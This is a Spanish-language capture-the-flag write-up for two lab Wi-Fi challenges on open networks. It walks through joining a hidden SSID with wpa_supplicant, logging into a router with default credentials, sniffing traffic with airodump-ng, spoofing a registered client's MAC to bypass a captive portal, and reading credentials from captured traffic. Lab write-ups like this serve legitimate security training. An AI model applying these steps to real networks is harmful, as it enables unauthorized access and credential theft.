Challenges OPN
Challenge 5 - ¿Cuál es la FLAG en el router del AP oculto tras unas credenciales por defecto?
Challenge 6 - ¿Cuál es la FLAG en el router AP de la red wifi-guest?
Challenge 5
¿Cuál es la FLAG en el router del AP oculto tras unas credenciales por defecto?
Al saber el SSID de la red gracias al ejercicio anterior "wifi-free", al ser una ser OPN nos podemos conectar directamente creando/generando el fichero de wpa_supplicant -->
## Creamos el fichero
nano wifi-free.conf
## Configuramos el archivo
network={
ssid="wifi-free"
key_mgmt=NONE
scan_ssid=1
}
ssid=Nombre de la wifi
key_mgmt=NONETipo de red a la que nos conectamos, en esta caso NONE ya que es una red OPN
scan_ssid=1Al ser un red oculta, es importante ponerlo en 1 para que "wpa_supplicant" mande probes obligatoriamente
Ahora nos conectamos a la red con wpa_supplicant, desde la interfaz y el fichero de cofiguracion -->
wpa_supplicant -i wlan2 -c wifi-free.conf
Ahora, tras tener conexión hacemos una consulta DHCP con dhclient para saber nuestra ip y la ip del router -->
sudo dhclient -v wlan2
Ahora podemos irnos al navegardor, pegar la ip de la puerta de enlace "router" y probamos contraseñas por defecto -->

admin:admin

Challenge 6
¿Cuál es la FLAG en el router AP de la red wifi-guest?
Tras analizar el trafico con airodump, veo la wifi-guest -->

Ahora configuramos el arhcivo para conectarnos de la misma mandera que antes -->
## Creamos el fichero
nano wifi-guest.conf
## Configuramos el archivo
network={
ssid="wifi-guest"
key_mgmt=NONE
}Ahora utilizamos wpa_supplicant para conectarnos con una interfaz normal en modo manage
wpa_supplicant -i wlan2 -c wifi-guest.conf
Y en una nueva terminal pedimos ip con dhclient -->
sudo dhclient -v wlan2
Ahora nos vamos al panel web de esta puerta de enlace "192.168.10.1" y vemos que es un portal cautivo


Para acceder a esta red necesitamos pasar este portal cautivo de alguna forma, asi que debemos escanear el canal correcto para analizar el trafico y las personas conectadas -->
Vemos que la "wifi-guest" se encuentra en el canal 6, asi que hacemos un escaneo solo sobre ese canal para guardar todo el trafico -->
airodump-ng wlan0 -w /home/user/wifi/OPN/wifi-guest --manufacturer --band bag -c6
MACChanger
Ahora podemos cambiarnos la dirección mac de nuestra tarjeta de red utilizada, a una direcion MAC de un usario previamente registrado dentro de ese portal causitvo y que sabemos que tiene acceso a la red por la cantidad de data que se envia -->
## Apagamos la interfaz wlan2 (interfaz en modo normal que no utiliza modo monitor)
ip link set wlan2 down
## Cambiamos la direccion MAC por uno de los clientes
macchanger -m 80:18:44:BF:72:47 wlan2
## Levantamos la interfaz
ip link set wlan2 up
## Paramos NetworkManager por posibles errores
systemctl stop network-manager.service
## Comprobamos MACs
macchanger wlan2
Ahora tras configurar esto, volvemos a conectarnos con wpa_supplicant -->
## Nos conectamos a la interfaz
wpa_supplicant -i wlan2 -c wifi-guest.conf
## Pedimos IP al DHCP
sudo dhclient -v wlan2Y volvemos a la pagina web en la 192.168.10.1 -->


Ahora podemos ver este panel web diferente tras tener acceso a la red. Al ser una wifi abierta podemos filtrar el trafico previemanete capturado con airodump-ng y ver data, viendo asi credenciales -->

free2:5LqwwccmTg6C39y

Last updated